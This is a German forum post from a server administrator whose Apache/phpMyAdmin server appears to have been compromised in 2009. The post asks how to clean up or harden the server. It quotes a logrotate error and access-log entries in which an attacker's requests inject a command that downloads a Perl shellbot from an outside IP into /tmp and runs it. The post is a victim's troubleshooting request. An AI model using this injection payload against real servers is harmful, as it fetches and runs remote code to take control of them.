ok,
das würde ich gerne als letztes Mittel machen. Es ist doch schon eine Menge Konfigurationszeit reingeflossen und evtl. kann man die Intrusion isolieren und ohne Komplettneuaufsetzen unschädlich machen?
Wobei ich auch nicht mehr in phpmyadmin reinkomme ("Ungültiger Host-Name für Server 1. Bitte überprüfen Sie Ihre Konfiguration.")
Für den Apache-Shutdown könnte auch folgendes verantwortlich sein (root mail):
Date: Sun, 2 Aug 2009 06:26:53 +0200 (CEST)
/etc/cron.daily/logrotate:
(98)Address already in use: make_sock: could not bind to address 0.0.0.0:80
no listening sockets available, shutting down
Unable to open logs
error: error running shared postrotate script for /var/log/apache2/*.log
run-parts: /etc/cron.daily/logrotate exited with return code 1
Alles anzeigen
Ansonsten hat es vor kurzem einen ähnlichen Angriff auf einen Debian-Server gegeben: http://forums.debian.net/viewtopic.php?f=5&t=41559
aso, und im accesslog hat es direkt vor den vom error.log aufgezeichneten einträgen folgendes gegeben:
85.214.71.129 - - [02/Aug/2009:02:12:50 +0200] "GET /phpMyAdmin/config/config.inc.php?c=cd%20/tmp;wget%20193.224.55.170/font-nix;perl%20font-nix HTTP/1.1" 404 355 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
85.214.71.129 - - [02/Aug/2009:02:12:50 +0200] "GET /phpMyAdmin/config/config.inc.php?c=cd%20/tmp;wget%20193.224.55.170/font-nix;perl%20font-nix HTTP/1.1" 404 355 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
85.214.71.129 - - [02/Aug/2009:02:12:50 +0200] "GET /phpMyAdmin/config/config.inc.php?c=cd%20/tmp;wget%20193.224.55.170/font-nix;perl%20font-nix HTTP/1.1" 404 355 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
85.214.71.129 - - [02/Aug/2009:02:12:51 +0200] "GET /phpMyAdmin/config/config.inc.php?c=cd%20/tmp;wget%20193.224.55.170/font-nix;perl%20font-nix HTTP/1.1" 404 355 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
85.214.71.129 - - [02/Aug/2009:02:12:51 +0200] "GET /phpMyAdmin/config/config.inc.php?c=cd%20/tmp;wget%20193.224.55.170/font-nix;perl%20font-nix HTTP/1.1" 404 355 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
85.214.71.129 - - [02/Aug/2009:02:12:51 +0200] "GET /phpMyAdmin/config/config.inc.php?c=cd%20/tmp;wget%20193.224.55.170/font-nix;perl%20font-nix HTTP/1.1" 404 355 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
weiß vielleicht einer, was für eine Art von Angriff hier gefahren wurde, wie man sich dagegen immunisieren kann? Auch damit es nach dem neuaufsetzen nicht gleich wieder vom gleichen gerooted (ist nicht klar) wird?
diese wget-versuche sind wohl ein Anzeichen für einen modifizierten iranischen Hack, der shellbot kommt aus singapur und die hackdateien selbst liegen auf einem Cronon-Server...
Naja, also für Tipps aller art bin ich dankbar, ansonsten werde ich wohl um ein neuaufsetzen nicht drumrumkommen.
firefly
PS: wenn ich ein backup von vor zwei wochen einspiele müsste das doch erst einmal ungecrackt sein oder? würde mich ein managed server vor solchen überfällen sicher schützen?